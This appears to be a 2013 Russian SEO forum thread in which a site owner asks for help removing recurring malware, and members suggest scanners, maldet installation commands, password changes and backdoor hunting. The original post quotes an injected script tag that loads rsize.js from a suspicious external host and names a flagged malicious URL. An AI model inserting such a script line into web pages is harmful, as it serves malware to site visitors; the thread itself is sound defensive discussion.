Вернуться   SEO форум - оптимизация и продвижение сайтов > Web разработки > Безопасность

Важная информация
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности.

Ответ
 
Опции темы Оценить тему Опции просмотра
Старый 11.02.2013, 06:07   #1
 
Аватар для Hohol36g
 
Сообщений: 17
FR (активность): 627

Доп. информация
Вопрос Автор темы Как найти вредоносный код в сайте???

Здравствуйте ув. форумчане. В 10й раз вынужден просить Вашей помощи. Никак не могу справиться с вирусами у себя на сайте. Сайт www.monti-sib.ru
Начнем по порядку:
Около 1,5 месяцев назад была проблема с вредоносным кодом (base64_decode. Разобрался, удалил. Вроде все стало хорошо, даже индексировать вновь яндекс начал. Но, буквально через недели 2 появился новый ко. Сначала не мог понять что за код, потом с помощью тех. поддержки Яндекса все таки выяснил что код вида:
</html>
}

<script src="http://feelthesame.changeip.name/rsize.js"></script>

Нашел, удалил. Залил обратно на сервер... первое время все было хорошо, НО теперь Яндекс вообще не пускает на сайт, пишет что сайт вредоносный. Якобы 2 страницы с таким кодом: главная и раздел крио оборудование. Вроде код удалил весь! через Notepad++ проверяю - нет его. Тех поддержка пишет, что есть! Однако, когда захожу на сайт, даже у меня антивирус ругается, пишет следующее:

http://fdlfvbh.ddns.name:1964/techno...tend-thats.php
JS/Kryptik.AGF троянская программа

Забиваю это в Нотпал - нет его! Проверил антивирусом скопированный на лок. диск сайт - нашел только, что файл JQuery.zip поврежден.

Что делать? Где искать код вредоносный? Спасибо заранее
Hohol36g вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 11.02.2013, 06:26   #2
 
Аватар для cpentyc
 
Сообщений: 136
FR (активность): 10,172

Доп. информация
По умолчанию

Мне один сайтег взломали 3 раза за месяц после чего я снял права на запись для всех пользователей. Теперь тишина уже 2 месяца без происшествий.


Знаю много, а толку мало. Я ленивая задница.
cpentyc вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 11.02.2013, 06:28   #3
 
Аватар для G4W2
 
Сообщений: 135
FR (активность): 5,930

Доп. информация
По умолчанию

http://antivirus-alarm.ru/proverka/?...w.monti-sib.ru
ознакомьтесь
только три авера пока ругаются и лочат сайт
если было все хорошо, то попробуйте из бекапа восстановить или в тп написать чтобы из своих восстановили.
Hohol36g: сообщение полезно


KINGSKIN.ORG рулетка cs go
G4W2 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 11.02.2013, 07:37   #4
 
Аватар для Hohol36g
 
Сообщений: 17
FR (активность): 627

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от G4W2 Посмотреть сообщение
бекапа восстановить или в тп написать чтобы из своих восстановили.
дело в том, что все мои бекапы, как выяснились уже с кодом! а тп говорит, что все бекапы хранит 7 дней. поэтому тут тоже не вариант
Hohol36g вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 11.02.2013, 08:03   #5
 
Аватар для G4W2
 
Сообщений: 135
FR (активность): 5,930

Доп. информация
По умолчанию

слить себе папочку с сайтом и просканить ее.
хотите я своим авером посмотрю ?


KINGSKIN.ORG рулетка cs go
G4W2 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 11.02.2013, 08:44   #6
 
Аватар для Hohol36g
 
Сообщений: 17
FR (активность): 627

Доп. информация
По умолчанию Автор темы

Цитата:
Сообщение от G4W2 Посмотреть сообщение
хотите я своим авером посмотрю ?
было бы здорово) напишите аську, скайп... что-нибудь для связи
Hohol36g вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 11.02.2013, 10:07   #7
 
Аватар для lipatoff
 
Сообщений: 443
FR (активность): 13,401

Доп. информация
По умолчанию

айболитом посмотри

http://revisium.com/ai/
Alex LM, alppro и G4W2: сообщение полезно
lipatoff вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
alppro (01.03.2013), G4W2 (11.02.2013)
Старый 11.02.2013, 22:26   #8
 
Аватар для kolian899
 
Сообщений: 57
FR (активность): 712

Доп. информация
По умолчанию

пиши в тех.поддержку хостинга пусть помогают
kolian899 вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 11.02.2013, 22:29   #9
 
Аватар для Canny
 
Сообщений: 334
FR (активность): 14,020

Доп. информация
По умолчанию

Цитата:
Сообщение от G4W2 Посмотреть сообщение
слить себе папочку с сайтом и просканить ее.
хотите я своим авером посмотрю ?
Кстати отличный способ! Я таким образом нашел вирус на сайте. Авирой


Здесь есть что-то прикольное
Canny вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 12.02.2013, 01:00   #10
 
Аватар для aleksandros
 
Сообщений: 2
FR (активность): 0

Доп. информация
По умолчанию

2ip.ru - принцип работы в этом сервисе обычный: прописываем адрес сайта который нужно проверить на наличие вредоносного кода и нажимаем кнопку «Проверить». После проверки вам выдаётся сообщение, были ли обнаружены на сайте вирусы или подозрительные коды. Этот сервис также проверяет, считают ли поисковики Яндекс и Google этот сайт зараженным. Но не всё так просто.
aleksandros вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 12.02.2013, 11:54   #11
 
Аватар для rtele
 
Сообщений: 3
FR (активность): 15

Доп. информация
По умолчанию

Если немного знакомы с администрированием, то советую использовать maldet, как вариант попросите своего хостера установить и проверить ваши данные.

cd /usr/local/src/
wget rfxn.com/downloads/maldetect-current.tar.gz
tar -xzf maldetect-current.tar.gz
cd maldetect-*
sh ./install.sh
maldet --update-ver
maldet --update

Запустить сканирование, например директории /home, можно так maldet -a /home
rtele вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 15.02.2013, 07:32   #12
 
Аватар для Professor
 
Сообщений: 310
FR (активность): 6,704

Доп. информация
По умолчанию

У меня когда вирус был на сайте. Он прописался в каждом, абсолютно в каждом файле внизу.
Все JS коды, все html, php, даже в css.
Код еще сложно найти потом что он зашифрован.

Просмотрите все файлы. Именно конец этих файлов. Конец, потому что если они поставят его выше, то может сайт сломаться, а им этого не нужно, им нужно что бы все работало хорошо и не вызывало подозрений.


В мире нет Вечных Двигателей, зато полно Вечных Тормозов. . .

Записки профессора
Professor вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 15.02.2013, 08:36   #13
 
Аватар для Unick
 
Сообщений: 711
FR (активность): 37,335

Доп. информация
По умолчанию

Hohol36g, на чем стоит сайт? Самописная цмс?
я бы на вашем месте в первую очередь задумался бы, как туда вирус то попал) Не первый же раз... Может шел залит?
а почему в конце страниц сайта стоит }?
Это нормально что чпу в виде index.php/page?

Оффтоп:
http://antivirus-alarm.ru/proverka/?url=www.monti-sib.ru


andreisoroka.com
Unick вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 01.03.2013, 17:37   #14
 
Аватар для mh-seo
 
Сообщений: 55
FR (активность): 7,084

Доп. информация
По умолчанию

какае нафиг антивирусы, люди не смешите, ТС, во первых смени везде пароли, в третих попроси хостера дать лог ошибок чтобы посмотреть через чо ломали твой сайт ,в третих найди шелл среди файлов и почисти файли от бекдоров, иначе будешь всю жизнь с подобной заразой мучаться
mh-seo вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Старый 01.03.2013, 18:37   #15
 
Аватар для alppro
 
Сообщений: 291
FR (активность): 10,580

Доп. информация
По умолчанию

Два варианта скачать сайт пройтись антивирусом,
Второй вариант установить айболит http://revisium.com/ai/
Третий в вебмастере google посмотреть вкладку вредоносное ПО - они обычно указывают что где.


Мои проекты:
диджитал агентство
спортивная одежда
магазин туристического снаряжения
alppro вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
Ответ

Метки
вредоносные скрипты, вредоносный код

Быстрый ответ
Ваше имя пользователя: Регистрация. Для входа нажмите здесь
Случайный вопрос

Сообщение:
Опции
Внимание!
Этой теме более 3410 дней. Вы можете оставить сообщение здесь. Но, обращаем внимание. Возможно, рациональней создать новую тему (найти свежее обсуждение)?


Опции темы
Опции просмотра Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вредоносный код на сайте emlonlife Яndex 3 12.01.2012 13:30
Вредоносный код tsa Безопасность 12 20.04.2011 20:41
Вредоносный код. Jaga Яndex 3 17.02.2011 12:04
вредоносный код Анатолька Безопасность 7 06.07.2010 20:06
Помогите найти ошибки на сайте.... ogerrr Раскрутка в общих чертах 4 04.12.2008 18:51

Текущее время: 20:37. Часовой пояс GMT +3.